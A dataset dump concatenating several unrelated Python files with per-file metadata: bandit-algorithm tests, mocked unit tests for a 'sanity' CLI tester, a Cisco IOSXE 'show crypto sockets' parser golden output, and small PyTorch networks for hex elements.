rewards = np.array([3, 3, 1, 0, -1, 2, 1, 2, 1, 1, 0, 3])
decisions = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1, l2_lambda=0),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [1, 1])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09224215, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], -0.20569848, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.13434242, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], -0.1000045, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.63726682, abs_tol=0.00000001))
context2 = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2], [-1, 4, 2, 0, 1], [1, 2, 3, 4, 5]])
rewards2 = np.array([-1, 2, 1, 2, 0])
decisions2 = np.array([1, 1, 1, 1, 1])
mab.fit(decisions2, rewards2, context2)
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.97297297, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 1.05405405, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], -0.86486486, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], -0.72972973, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.48648649, abs_tol=0.00000001))
def test_fit_twice_new_features(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2], [-1, 4, 2, 0, 1],
[2, 2, 2, 2, 2], [3, 2, 1, 2, 3], [0, 0, 0, 0, 0], [2, 1, 1, 1, 2],
[3, 2, 3, 2, 3], [8, 2, 3, 1, 0], [1, 2, -9, -7, 1], [0, 1, 1, 1, 1]])
rewards = np.array([3, 3, 1, 0, -1, 2, 1, 2, 1, 1, 0, 3])
decisions = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1, l2_lambda=0),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [1, 1])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09224215, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], -0.20569848, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.13434242, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], -0.1000045, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.63726682, abs_tol=0.00000001))
context2 = np.array([[1, 0, 2, 1, 1, 3], [3, 1, 2, 3, 4, 1], [2, -1, 1, 0, 2, 2], [-1, 4, 2, 0, 1, 0],
[1, 2, 3, 4, 5, 1]])
rewards2 = np.array([-1, 2, 1, 2, 0])
decisions2 = np.array([1, 1, 1, 1, 1])
mab.fit(decisions2, rewards2, context2)
self.assertEqual(mab._imp.num_features, 6)
def test_add_arm(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2]])
rewards = np.array([3, 3, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
mab.add_arm(2)
self.assertTrue(2 in mab._imp.arm_to_model.keys())
self.assertEqual(mab._imp.arm_to_model[2].beta[0], 0)
self.assertEqual(mab._imp.arm_to_model[2].beta[1], 0)
self.assertEqual(mab._imp.arm_to_model[2].beta[2], 0)
self.assertEqual(mab._imp.arm_to_model[2].beta[3], 0)
self.assertEqual(mab._imp.arm_to_model[2].beta[4], 0)
def test_remove_arm(self):
arm, mab = self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 3, 2, 2, 3, 1, 3, 1],
rewards=[0, 1, 1, 0, 1, 0, 1, 1, 1, 1],
learning_policy=LearningPolicy.LinTS(alpha=0.24),
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=4,
is_predict=True)
mab.remove_arm(3)
self.assertTrue(3 not in mab.arms)
self.assertTrue(3 not in mab._imp.arms)
self.assertTrue(3 not in mab._imp.arm_to_expectation)
self.assertTrue(3 not in mab._imp.arm_to_model)
def test_warm_start(self):
_, mab = self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 1, 2, 2, 2, 1, 2, 1],
rewards=[0, 1, 1, 0, 1, 0, 1, 1, 1, 1],
learning_policy=LearningPolicy.LinTS(alpha=0.24),
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=4,
is_predict=True)
# Before warm start
self.assertEqual(mab._imp.trained_arms, [1, 2])
self.assertDictEqual(mab._imp.arm_to_expectation, {1: 0.0, 2: 0.0, 3: 0.0})
self.assertListAlmostEqual(mab._imp.arm_to_model[1].beta, [0.19635284, 0.11556404, 0.57675997, 0.30597964, -0.39100933])
self.assertListAlmostEqual(mab._imp.arm_to_model[3].beta, [0, 0, 0, 0, 0])
# Warm start
mab.warm_start(arm_to_features={1: [0, 1], 2: [0, 0], 3: [0.5, 0.5]}, distance_quantile=0.5)
self.assertListAlmostEqual(mab._imp.arm_to_model[3].beta, [0.19635284, 0.11556404, 0.57675997, 0.30597964, -0.39100933])
| 56.527938
| 128
| 0.492535
| 4,080
| 29,338
| 3.385784
| 0.041176
| 0.040104
| 0.036485
| 0.104459
| 0.928116
| 0.914941
| 0.908933
| 0.898943
| 0.883958
| 0.874113
| 0
| 0.154182
| 0.352035
| 29,338
| 519
| 129
| 56.527938
| 0.572488
| 0.003954
| 0
| 0.72
| 0
| 0
| 0.00024
| 0
| 0
| 0
| 0
| 0
| 0.284706
| 1
| 0.035294
| false
| 0
| 0.014118
| 0
| 0.051765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc7a9bea85936ee4bf5630a996f1753df0a4b812
| 10,629
|
py
|
Python
|
sanity/tests/test_cli.py
|
CiscoCloud/sdu-test-sanity
|
9653ab953bedff015737f99b75ae5b5bb490894c
|
[
"Apache-2.0"
] | null | null | null |
sanity/tests/test_cli.py
|
CiscoCloud/sdu-test-sanity
|
9653ab953bedff015737f99b75ae5b5bb490894c
|
[
"Apache-2.0"
] | null | null | null |
sanity/tests/test_cli.py
|
CiscoCloud/sdu-test-sanity
|
9653ab953bedff015737f99b75ae5b5bb490894c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2015-2016 Cisco Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import TestCase
import Queue
import mock
from sanity import cli
from sanity import scenarios
class AttrDict(dict):
    """A dict whose items are also readable/writable as attributes."""

    def __init__(self, *args, **kwargs):
        dict.__init__(self, *args, **kwargs)
        # Alias the attribute namespace to the mapping itself, so that
        # d.key and d['key'] are the same storage.
        self.__dict__ = self
class TestTesterThread(TestCase):
    """Exercises cli.Tester's queue-processing loop with mocked collaborators.

    NOTE(review): the mock_calls assertions below depend on the exact order of
    statements; keep that order when editing.
    """

    def setup_conf(self, conf, **kwargs):
        # Populate the patched CONF with minimal keystone credentials plus the
        # per-test action flags supplied via kwargs.
        conf.keystone = AttrDict()
        conf.keystone.auth_url = 'mock://localhost'
        conf.keystone.tenant_name = 'mock_tenant'
        conf.keystone.username = 'mock_username'
        conf.keystone.password = 'secret'
        conf.keystone.endpoint_type = 'publicURL'
        conf.action = AttrDict(**kwargs)

    def setup_tester(self):
        # Build a Tester wired to fresh queues and a mock insanity object.
        # The constructor is expected to call get_state() exactly once.
        self.in_queue = Queue.Queue()
        self.out_queue = Queue.Queue()
        self.insanity = mock.Mock()
        tester = cli.Tester(in_queue=self.in_queue,
                            out_queue=self.out_queue,
                            insanity=self.insanity)
        self.assertEqual(self.insanity.mock_calls, [mock.call.get_state()])
        self.insanity.reset_mock()
        self.assertTrue(self.in_queue.empty())
        self.assertTrue(self.out_queue.empty())
        return tester

    def assertAllProcessed(self):
        # Both queues drained means every submitted server was handled.
        self.assertTrue(self.in_queue.empty())
        self.assertTrue(self.out_queue.empty())

    @mock.patch('sanity.runner.Runner')
    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    def test_finished_processing(self, cli_conf, mock_runner):
        # Finishing an empty queue lets the worker callable return cleanly.
        self.setup_conf(cli_conf,
                        no_delete_failed=False, no_delete=False, test=[])
        tester = self.setup_tester()
        tester.finish()
        tester()

    @mock.patch('sanity.runner.Runner')
    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    def test_processing_a_host(self, cli_conf, mock_runner):
        # One queued server gets run, deleted and waited on, in that order.
        self.setup_conf(cli_conf,
                        no_delete_failed=False, no_delete=False, test=[])
        tester = self.setup_tester()
        server = mock.Mock()
        self.in_queue.put(server)
        tester.finish()
        tester()
        server = self.out_queue.get_nowait()
        self.assertAllProcessed()
        self.assertEqual(mock_runner().method_calls,
                         [mock.call.run_server(self.insanity, server),
                          mock.call.cleanup()])
        self.assertEqual(server.mock_calls,
                         [mock.call.delete()])
        self.assertEqual(self.insanity.mock_calls,
                         [mock.call.wait_for_servers([server])])

    @mock.patch('sanity.runner.Runner')
    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    def test_processing_an_unbootable_server(self, cli_conf, mock_runner):
        # An UnbootableServer is still run, but no insanity calls are made.
        self.setup_conf(cli_conf,
                        no_delete_failed=False, no_delete=False, test=[])
        tester = self.setup_tester()
        server = scenarios.UnbootableServer()
        self.in_queue.put(server)
        tester.finish()
        tester()
        server = self.out_queue.get_nowait()
        self.assertAllProcessed()
        self.assertEqual(mock_runner().method_calls,
                         [mock.call.run_server(self.insanity, server),
                          mock.call.cleanup()])
        self.assertEqual(self.insanity.mock_calls, [])

    @mock.patch('sanity.runner.Runner')
    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    def test_tester_stopped_server_delete_negative(self, cli_conf,
                                                   mock_runner):
        # A failing delete on a stopped tester is swallowed; only cleanup runs.
        self.setup_conf(cli_conf,
                        no_delete_failed=False, no_delete=False, test=[])
        tester = self.setup_tester()
        server = mock.Mock()
        server.delete.side_effect = Exception('error deleting')
        self.in_queue.put(server)
        tester.finish()
        tester.stop()
        tester()
        self.assertAllProcessed()
        server.delete.assert_called_once_with()
        self.assertEqual(mock_runner().method_calls,
                         [mock.call.cleanup()])
        self.assertEqual(self.insanity.mock_calls, [])

    @mock.patch('sanity.runner.Runner')
    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    def test_tester_stopped_server_delete(self, cli_conf, mock_runner):
        # A stopped tester still deletes queued servers but skips the run.
        self.setup_conf(cli_conf,
                        no_delete_failed=False, no_delete=False, test=[])
        tester = self.setup_tester()
        server = mock.Mock()
        self.in_queue.put(server)
        tester.finish()
        tester.stop()
        tester()
        self.assertAllProcessed()
        server.delete.assert_called_once_with()
        self.assertEqual(mock_runner().method_calls,
                         [mock.call.cleanup()])
        self.assertEqual(self.insanity.mock_calls, [])

    @mock.patch('sanity.runner.Runner')
    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    @mock.patch.object(cli.Tester, 'test_server')
    def test_server_test_exception(self, test_server, cli_conf, mock_runner):
        # A raising test_server still forwards the server and cleans up.
        self.setup_conf(cli_conf,
                        no_delete_failed=False, no_delete=False, test=[])
        test_server.side_effect = Exception("Failed")
        tester = self.setup_tester()
        server = mock.Mock()
        self.in_queue.put(server)
        tester.finish()
        tester()
        test_server.assert_called_once_with(server)
        server = self.out_queue.get_nowait()
        self.assertAllProcessed()
        self.assertEqual(mock_runner().method_calls,
                         [mock.call.cleanup()])
        self.assertEqual(self.insanity.mock_calls, [])

    @mock.patch('sanity.runner.Runner')
    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    @mock.patch.object(cli.Tester, 'delete_server')
    def test_delete_server_exception(self, delete_server, cli_conf,
                                     mock_runner):
        # A raising delete_server does not prevent running or waiting.
        self.setup_conf(cli_conf,
                        no_delete_failed=False, no_delete=False, test=[])
        delete_server.side_effect = Exception("Failed")
        tester = self.setup_tester()
        server = mock.Mock()
        self.in_queue.put(server)
        tester.finish()
        tester()
        delete_server.assert_called_once_with(server)
        server = self.out_queue.get_nowait()
        self.assertAllProcessed()
        self.assertEqual(mock_runner().method_calls,
                         [mock.call.run_server(self.insanity, server),
                          mock.call.cleanup()])
        self.assertEqual(self.insanity.mock_calls,
                         [mock.call.wait_for_servers([server])])
class UnitTestTesterThread(TestCase):
    """Unit-level checks of cli.Tester.initialize()."""

    def setup_conf(self, conf):
        # Minimal keystone credentials for the patched CONF.
        conf.keystone = AttrDict()
        conf.keystone.auth_url = 'mock://localhost'
        conf.keystone.tenant_name = 'mock_tenant'
        conf.keystone.username = 'mock_username'
        conf.keystone.password = 'secret'
        conf.keystone.endpoint_type = 'publicURL'

    @mock.patch('sanity.runner.Runner')
    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    def test_initialize(self, cli_conf, mock_runner):
        in_queue = Queue.Queue()
        out_queue = Queue.Queue()
        insanity = mock.Mock()
        self.setup_conf(cli_conf)
        conf = AttrDict(no_delete_failed=False, no_delete=False, test=[])
        cli_conf.action = conf
        tester = cli.Tester(in_queue=in_queue,
                            out_queue=out_queue,
                            insanity=insanity)
        # setUpFixtures() returning None leaves the tester uncompromised ...
        mock_runner().setUpFixtures.return_value = None
        tester.initialize()
        self.assertEqual(tester.compromised, False)
        # ... while any non-None result marks it compromised.
        mock_runner().setUpFixtures.return_value = mock.sentinel
        tester.initialize()
        self.assertEqual(tester.compromised, True)
class TestFixturerThread(TestCase):
    """Exercises cli.Fixturer's queue-processing loop with mocked collaborators."""

    def setup_conf(self, conf, **kwargs):
        # Populate the patched CONF with minimal keystone credentials plus the
        # per-test action flags supplied via kwargs.
        conf.keystone = AttrDict()
        conf.keystone.auth_url = 'mock://localhost'
        conf.keystone.tenant_name = 'mock_tenant'
        conf.keystone.username = 'mock_username'
        conf.keystone.password = 'secret'
        conf.keystone.endpoint_type = 'publicURL'
        conf.action = AttrDict(**kwargs)

    def setup_tester(self):
        # Unlike Tester, the Fixturer constructor makes no insanity calls.
        self.in_queue = Queue.Queue()
        self.out_queue = Queue.Queue()
        self.insanity = mock.Mock()
        tester = cli.Fixturer(in_queue=self.in_queue,
                              out_queue=self.out_queue,
                              insanity=self.insanity)
        self.assertEqual(self.insanity.mock_calls, [])
        self.insanity.reset_mock()
        self.assertTrue(self.in_queue.empty())
        self.assertTrue(self.out_queue.empty())
        return tester

    def assertAllProcessed(self):
        # Both queues drained means every submitted server was handled.
        self.assertTrue(self.in_queue.empty())
        self.assertTrue(self.out_queue.empty())

    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    def test_finished_processing(self, cli_conf):
        # Finishing an empty queue lets the worker callable return cleanly.
        self.setup_conf(cli_conf, no_delete_failed=False, with_fixture=[])
        tester = self.setup_tester()
        tester.finish()
        tester()

    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    def test_processing_a_host(self, cli_conf):
        # A queued server is waited on and re-fetched, but never touched itself.
        self.setup_conf(cli_conf, no_delete_failed=False, with_fixture=[])
        tester = self.setup_tester()
        server = mock.Mock()
        self.in_queue.put(server)
        tester.finish()
        tester()
        server = self.out_queue.get_nowait()
        self.assertAllProcessed()
        self.assertEqual(server.mock_calls, [])
        self.assertEqual(self.insanity.mock_calls,
                         [mock.call.wait_for_servers([server]),
                          mock.call.state.nova.servers.get(server)])

    @mock.patch('sanity.cli.CONF', new_callable=AttrDict)
    def test_initialize(self, cli_conf):
        # initialize() on a fresh Fixturer leaves it uncompromised.
        self.setup_conf(cli_conf, no_delete_failed=False, with_fixture=[])
        tester = self.setup_tester()
        tester.initialize()
        self.assertEqual(tester.compromised, False)
| 39.808989
| 78
| 0.628563
| 1,222
| 10,629
| 5.251228
| 0.135025
| 0.037089
| 0.044413
| 0.030856
| 0.824996
| 0.800686
| 0.788842
| 0.773259
| 0.766402
| 0.766402
| 0
| 0.001648
| 0.258068
| 10,629
| 266
| 79
| 39.958647
| 0.812072
| 0.05946
| 0
| 0.768889
| 0
| 0
| 0.054103
| 0
| 0
| 0
| 0
| 0
| 0.182222
| 1
| 0.084444
| false
| 0.013333
| 0.022222
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc8a5b4a81faa5faf0d899b2e8aad1414da5cf06
| 3,434
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowCryptoSockets/cli/equal/golden_1_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowCryptoSockets/cli/equal/golden_1_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
src/genie/libs/parser/iosxe/tests/ShowCryptoSockets/cli/equal/golden_1_expected.py
|
nielsvanhooy/genieparser
|
9a1955749697a6777ca614f0af4d5f3a2c254ccd
|
[
"Apache-2.0"
] | null | null | null |
# Golden expected parse result for a "show crypto sockets" output (IOSXE
# ShowCryptoSockets parser test). Four IPSec socket connections
# (Tu1/Tu2/Tu3/Tu20); each entry records the tunnel peers, local/remote
# identities, socket state, IPSec profile, client state/name, and — where
# present in the device output — extra "true ident" flows.
expected_output = {
    'socket_connections': {
        'total_socket_connections': 4,
        'sockets_in_listen_state': ['Tunnel1-head-0', 'Tunnel2-head-0', 'Tunnel3-head-0', 'Tunnel20-head-0'],
        'Tu1': {
            'peers': {
                'remote_ip': '10.0.0.2',
                'local_ip': '85.45.1.1'
            },
            'local_ident': {
                'protocol': 47,
                'mask': '255.255.255.255',
                'port': 0,
                'address': '85.45.1.1'
            },
            'remote_ident': {
                'protocol': 47,
                'mask': '255.255.255.255',
                'port': 0,
                'address': '10.0.0.2'
            },
            'socket_state': 'Open',
            'ipsec_profile': 'star',
            'client_state': 'Active',
            'client_name': 'TUNNEL SEC'
        },
        'Tu2': {
            'peers': {
                'remote_ip': '10.0.0.2',
                'local_ip': '85.45.2.1'
            },
            'local_ident': {
                'protocol': 47,
                'mask': '255.255.255.255',
                'port': 0,
                'address': '85.45.2.1'
            },
            'remote_ident': {
                'protocol': 47,
                'mask': '255.255.255.255',
                'port': 0,
                'address': '10.0.0.2'
            },
            'socket_state': 'Open',
            'ipsec_profile': 'star',
            'client_state': 'Active',
            'client_name': 'TUNNEL SEC'
        },
        'Tu3': {
            'peers': {
                'remote_ip': '10.0.0.2',
                'local_ip': '85.45.3.1'
            },
            'local_ident': {
                'protocol': 47,
                'mask': '255.255.255.255',
                'port': 0,
                'address': '85.45.3.1'
            },
            'remote_ident': {
                'protocol': 47,
                'mask': '255.255.255.255',
                'port': 0,
                'address': '10.0.0.2'
            },
            'socket_state': 'Open',
            'ipsec_profile': 'star',
            'client_state': 'Active',
            'client_name': 'TUNNEL SEC',
            'true_ident': ['0.0.0.0/0.0.0.0/0/0 -> 0.0.0.0/0.0.0.0/0/0', '::/0/0/0 -> ::/0/0/0']
        },
        'Tu20': {
            'peers': {
                'remote_ip': '22.1.1.1',
                'local_ip': '21.1.1.1'
            },
            'local_ident': {
                'protocol': 0,
                'mask': '0.0.0.0',
                'port': 0,
                'address': '0.0.0.0'
            },
            'remote_ident': {
                'protocol': 0,
                'mask': '0.0.0.0',
                'port': 0,
                'address': '0.0.0.0'
            },
            'socket_state': 'Open',
            'ipsec_profile': 'IPSEC_PROFILE',
            'client_state': 'Active',
            'client_name': 'TUNNEL SEC',
            'true_ident': ['172.18.1.0/255.255.255.0/0/0 -> 10.4.0.0/255.255.255.0/0/0',
                           '172.17.1.0/255.255.255.0/0/0 -> 10.4.0.0/255.255.255.0/0/0',
                           '172.17.1.0/255.255.255.0/0/0 -> 10.1.0.0/255.255.255.0/0/0',
                           '172.16.1.0/255.255.255.0/0/0 -> 10.1.0.0/255.255.255.0/0/0',
                           '6664:3038:6162:6364::/64/0/0 -> 6664:3038:6665:6564::/64/0/0']
        }
    }
}
| 34.34
| 110
| 0.354106
| 385
| 3,434
| 3.049351
| 0.155844
| 0.110733
| 0.102215
| 0.091993
| 0.800681
| 0.770869
| 0.770869
| 0.770869
| 0.770869
| 0.722317
| 0
| 0.219904
| 0.455737
| 3,434
| 100
| 111
| 34.34
| 0.40824
| 0
| 0
| 0.59
| 0
| 0.06
| 0.409316
| 0.092868
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fca468b4cb8ee4246cb643257452fa3d4a56b71c
| 3,936
|
py
|
Python
|
machine_learning_module/hex_nn_models.py
|
msc-acse/acse-9-independent-research-project-lunayeliu
|
8643db1b21d6c2e7e6f1370a9b12a65ec67cce61
|
[
"MIT"
] | null | null | null |
machine_learning_module/hex_nn_models.py
|
msc-acse/acse-9-independent-research-project-lunayeliu
|
8643db1b21d6c2e7e6f1370a9b12a65ec67cce61
|
[
"MIT"
] | null | null | null |
machine_learning_module/hex_nn_models.py
|
msc-acse/acse-9-independent-research-project-lunayeliu
|
8643db1b21d6c2e7e6f1370a9b12a65ec67cce61
|
[
"MIT"
] | 1
|
2019-08-30T14:17:43.000Z
|
2019-08-30T14:17:43.000Z
|
from collections import OrderedDict
import torch.nn as nn
# 2 Layers model
class DLCM_hex_8_2(nn.Module):
    """Two-layer fully connected network for hex elements with 8 nodes.

    Input  - 8x3 nodal values, flattened to 24 features.
    Output - 20 values.
    """

    def __init__(self):
        super(DLCM_hex_8_2, self).__init__()
        # Layer widths from the flattened input (8 nodes x 3 components)
        # down to the 20-value output; module names match f<k>/relu<k>.
        widths = [8 * 3, 50, 20]
        stages = OrderedDict()
        for k in range(1, len(widths)):
            stages['f%d' % k] = nn.Linear(widths[k - 1], widths[k])
            if k < len(widths) - 1:
                stages['relu%d' % k] = nn.ReLU()
        self.fc = nn.Sequential(stages)

    def forward(self, input):
        """Apply the fully connected stack to a flattened (N, 24) batch."""
        return self.fc(input)
# 3 Layers model
class DLCM_hex_8_3(nn.Module):
    """Three-layer fully connected network for hex elements with 8 nodes.

    Input  - 8x3 nodal values, flattened to 24 features.
    Output - 20 values.
    """

    def __init__(self):
        super(DLCM_hex_8_3, self).__init__()
        # Layer widths from the flattened input (8 nodes x 3 components)
        # down to the 20-value output; module names match f<k>/relu<k>.
        widths = [8 * 3, 50, 50, 20]
        stages = OrderedDict()
        for k in range(1, len(widths)):
            stages['f%d' % k] = nn.Linear(widths[k - 1], widths[k])
            if k < len(widths) - 1:
                stages['relu%d' % k] = nn.ReLU()
        self.fc = nn.Sequential(stages)

    def forward(self, input):
        """Apply the fully connected stack to a flattened (N, 24) batch."""
        return self.fc(input)
class DLCM_hex_8_4(nn.Module):
    """Four-layer fully connected network for hex elements with 8 nodes.

    Input  - 8x3 nodal values, flattened to 24 features.
    Output - 20 values.
    """

    def __init__(self):
        super(DLCM_hex_8_4, self).__init__()
        # Layer widths from the flattened input (8 nodes x 3 components)
        # down to the 20-value output; module names match f<k>/relu<k>.
        widths = [8 * 3, 50, 50, 40, 20]
        stages = OrderedDict()
        for k in range(1, len(widths)):
            stages['f%d' % k] = nn.Linear(widths[k - 1], widths[k])
            if k < len(widths) - 1:
                stages['relu%d' % k] = nn.ReLU()
        self.fc = nn.Sequential(stages)

    def forward(self, input):
        """Apply the fully connected stack to a flattened (N, 24) batch."""
        return self.fc(input)
#5 layers model
class DLCM_hex_8_5(nn.Module):
    """Five-layer fully connected network for hex elements with 8 nodes.

    Input  - 8x3 nodal values, flattened to 24 features.
    Output - 20 values.
    """

    def __init__(self):
        super(DLCM_hex_8_5, self).__init__()
        # Layer widths from the flattened input (8 nodes x 3 components)
        # down to the 20-value output; module names match f<k>/relu<k>.
        widths = [8 * 3, 50, 50, 40, 30, 20]
        stages = OrderedDict()
        for k in range(1, len(widths)):
            stages['f%d' % k] = nn.Linear(widths[k - 1], widths[k])
            if k < len(widths) - 1:
                stages['relu%d' % k] = nn.ReLU()
        self.fc = nn.Sequential(stages)

    def forward(self, input):
        """Apply the fully connected stack to a flattened (N, 24) batch."""
        return self.fc(input)
#6 layers model
class DLCM_hex_8_6(nn.Module):
    """Six-layer fully connected network for hex elements with 8 nodes.

    Input  - 8x3 nodal values, flattened to 24 features.
    Output - 20 values.
    """

    def __init__(self):
        super(DLCM_hex_8_6, self).__init__()
        # Layer widths from the flattened input (8 nodes x 3 components)
        # down to the 20-value output; module names match f<k>/relu<k>.
        widths = [8 * 3, 50, 50, 40, 30, 25, 20]
        stages = OrderedDict()
        for k in range(1, len(widths)):
            stages['f%d' % k] = nn.Linear(widths[k - 1], widths[k])
            if k < len(widths) - 1:
                stages['relu%d' % k] = nn.ReLU()
        self.fc = nn.Sequential(stages)

    def forward(self, input):
        """Apply the fully connected stack to a flattened (N, 24) batch."""
        return self.fc(input)
#7 layers model
class DLCM_hex_8_7(nn.Module):
    """Seven-layer fully connected network for hex elements with 8 nodes.

    Input  - 8x3 nodal values, flattened to 24 features.
    Output - 20 values.

    Note: the original OrderedDict used the key 'f6' twice, so the
    Linear(35, 30) stage was silently dropped and the network ended with a
    ReLU and only six linear layers. Fixed: f6 is Linear(35, 30) and the
    final stage is f7 = Linear(30, 20), matching the "7 layers" contract.
    """
    def __init__(self):
        super(DLCM_hex_8_7, self).__init__()
        self.fc = nn.Sequential(OrderedDict([
            ('f1', nn.Linear(8*3, 50)),
            ('relu1', nn.ReLU()),
            ('f2', nn.Linear(50, 50)),
            ('relu2', nn.ReLU()),
            ('f3', nn.Linear(50, 45)),
            ('relu3', nn.ReLU()),
            ('f4', nn.Linear(45, 40)),
            ('relu4', nn.ReLU()),
            ('f5', nn.Linear(40, 35)),
            ('relu5', nn.ReLU()),
            ('f6', nn.Linear(35, 30)),
            ('relu6', nn.ReLU()),
            ('f7', nn.Linear(30, 20)),
        ]))
    def forward(self, input):
        """Apply the fully connected stack to a flattened (N, 24) batch."""
        output = self.fc(input)
        return output
| 24.6
| 45
| 0.473577
| 486
| 3,936
| 3.662551
| 0.113169
| 0.121348
| 0.053933
| 0.04382
| 0.940449
| 0.940449
| 0.814607
| 0.814607
| 0.814607
| 0.686517
| 0
| 0.086261
| 0.349085
| 3,936
| 159
| 46
| 24.754717
| 0.608509
| 0.109756
| 0
| 0.734694
| 0
| 0
| 0.047648
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.122449
| false
| 0
| 0.020408
| 0
| 0.265306
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
